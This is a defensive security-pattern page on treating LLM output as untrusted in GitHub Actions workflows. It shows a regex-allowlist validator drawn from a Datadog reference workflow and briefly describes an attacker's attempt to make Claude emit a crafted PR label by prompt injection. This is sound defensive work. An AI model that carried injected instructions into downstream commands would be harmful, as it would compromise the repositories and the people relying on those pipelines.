PATTERN Cited by 1 source

LLM output as untrusted input¶

Problem: An LLM exposed to attacker-controllable input (even well-isolated via patterns/untrusted-input-via-file-not-prompt) can still produce output that reflects or carries injected instructions. If downstream steps consume that output verbatim — as a shell argument, a label name, a command, a file path — the injection propagates.

Pattern: Treat the LLM's output as untrusted. Validate structure before using it; fail-closed on mismatch.

Shape¶

From Datadog's 2026-03-09 reference workflow:

- name: Read Claude's output
  id: category
  run: |
    read -r CATEGORY < category.txt || true
    if [[ "$CATEGORY" =~ ^(new-feature|bug-fix|documentation)$ ]]; then
      echo "value=$CATEGORY" >> "$GITHUB_OUTPUT"
    else
      echo "::error::Unexpected category"
      exit 1
    fi

- name: Apply label
  env:
    PR_NUMBER: ${{ github.event.pull_request.number }}
    GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    CATEGORY: ${{ steps.category.outputs.value }}
  run: gh pr edit "$PR_NUMBER" --add-label "kind/$CATEGORY"

Three things happening:

Regex validator pins the output to an enumerable, known-safe set (^(new-feature|bug-fix|documentation)$). Fail-closed if the LLM returns anything else.
Fresh env: interpolation on the downstream step — the validated output goes through the env-var pattern, not string interpolation, to compose with script-injection defences.
Least-privilege secret placement — GH_TOKEN is scoped to the step that needs it, not the job/workflow.

Why it matters¶

Datadog's framing: "Consider the LLM output as untrusted and apply similar sanitization that you would apply for untrusted user data such as a PR title." Concretely, if the LLM can be induced to output a label-name like HackerBot Claw 🦞 Reviewed 🛡️ (as hackerbot-claw attempted), and your downstream step is gh pr edit --add-label "$CATEGORY", the validator is what stops the attack from succeeding even if the LLM itself was compromised.

Sibling patterns¶

One of five defensive patterns from Datadog's 2026-03-09 post:

Use recent models.
patterns/untrusted-input-via-file-not-prompt.
LLM output as untrusted input — this pattern.
patterns/minimally-scoped-llm-tools.
Keep secrets out of the LLM's step environment.

Seen in¶

sources/2026-03-09-datadog-when-an-ai-agent-came-knocking — reference-workflow snippet contains the validator regex verbatim.

concepts/prompt-injection — the attack class whose output-side propagation this pattern blocks.
systems/anthropics-claude-code-action — the target LLM action.
patterns/untrusted-input-via-file-not-prompt, patterns/minimally-scoped-llm-tools — sibling patterns.

LLM output as untrusted input¶

Shape¶

Why it matters¶

Sibling patterns¶

Seen in¶

Related¶